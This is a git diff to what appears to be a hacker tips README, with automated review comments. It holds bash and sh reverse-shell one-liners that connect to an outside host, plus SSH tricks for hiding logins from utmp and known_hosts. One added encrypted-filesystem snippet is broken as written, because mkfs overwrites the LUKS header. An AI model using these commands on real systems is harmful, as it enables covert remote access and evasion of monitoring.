diff --git a/README.md b/README.md index 3dc7169..ffba294 100644 --- a/README.md +++ b/README.md @@ -26,7 +26,7 @@ $ kill -9 $$ ``` $ ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i" ``` -This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. On your client side it will stop logging the host name to *~/.ssh/known_hosts*. +This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to *~/.ssh/known_hosts*. **3. SSH tunnel OUT** 
@@ -253,7 +253,57 @@ Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from our system (cou # tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ``` -**20. Bash reverse shell** +**20. Generate quick random Password** + +Good for quick passwords without human element. + +``` +$ openssl rand -base64 24 +``` + +**21. Get a root shell in Docker container.** + +If the container is already running: + +``` +$ docker exec -it --user root /bin/bash +``` + +If the container is not running: + +``` +$ docker run -it --user root --entrypoint /bin/bash +``` + +**22. Linux transportable encrypted filesystems.** + +Like truecrypt but better. You may need to `losetup -f` to get a loop device. + +Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password. + +``` +$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock +$ cryptsetup luksFormat /tmp/crypted +$ mkfs.ext3 /tmp/crypted +``` + +Mount: + +``` +# losetup /dev/loop0 /tmp/crypted +# cryptsetup open /dev/loop0 crypted +# mount -t ext3 /dev/mapper/crypted /mnt/crypted +``` + +Store data in `/mnt/crypted`, then unmount: + +``` +# umount /mnt/crypted +# cryptsetup close crypted +# losetup -d /dev/loop0 +``` + +**23. Bash reverse shell** Start netcat to listen on port 1524 on your system: ``` @@ -265,7 +315,7 @@ On the remote system. This Bash will connect back to your system (IP = 3.13.3.7, $ bash -i 2>&1 >& /dev/tcp/3.13.3.7/1524 0>&1 ``` -**21. Reverse Shell without Bash** +**24. Reverse Shell without Bash** Especially embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -281,6 +331,7 @@ $ mkfifo /tmp/.io $ sh -i 2>&1 /tmp/.io ``` + -------------------------------------------------------------------------- Shoutz: ADM
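Review bot: in the first hunk (README.md @@ -26), the added sentence "It will bypass .profile and .bash_profile as well" is only half right: `ssh ... "bash -i"` starts a non-login shell, so the login files are skipped, but an interactive bash still sources `~/.bashrc` (and `/etc/bash.bashrc`), so the wording should be narrowed to the login files, e.g. "It skips the login files (.profile, .bash_profile) but still reads ~/.bashrc." The sentence also keeps the "wont" typo from the old line; change it to "won't" while the line is being touched. For readers on the defending side it is worth a short clause that not appearing in utmp/`w`/`who` does not mean the login is unlogged: sshd still records the authentication in the system auth log or journal.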
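Review bot: in the second hunk (README.md @@ -253), two of the new snippets do not run as written. In item 21 both docker commands lack their positional argument: `docker exec -it --user root /bin/bash` needs the container name or ID before the command (`docker exec -it --user root <container> /bin/bash`), and `docker run -it --user root --entrypoint /bin/bash` needs the image name at the end (`docker run -it --user root --entrypoint /bin/bash <image>`). In item 22 the step `mkfs.ext3 /tmp/crypted` is run on the raw container file immediately after `cryptsetup luksFormat /tmp/crypted`, which overwrites the LUKS header that was just written and leaves a plain, unencrypted ext3 filesystem in the file; the filesystem has to be created on the opened mapping, so move the `losetup /dev/loop0 /tmp/crypted` and `cryptsetup open /dev/loop0 crypted` steps ahead of it and use `mkfs.ext3 /dev/mapper/crypted`, then unmount/close as the text already shows. Since the old items 20 and 21 are renumbered to 23 and 24, any cross-references to those numbers elsewhere in the README should be checked as part of this change.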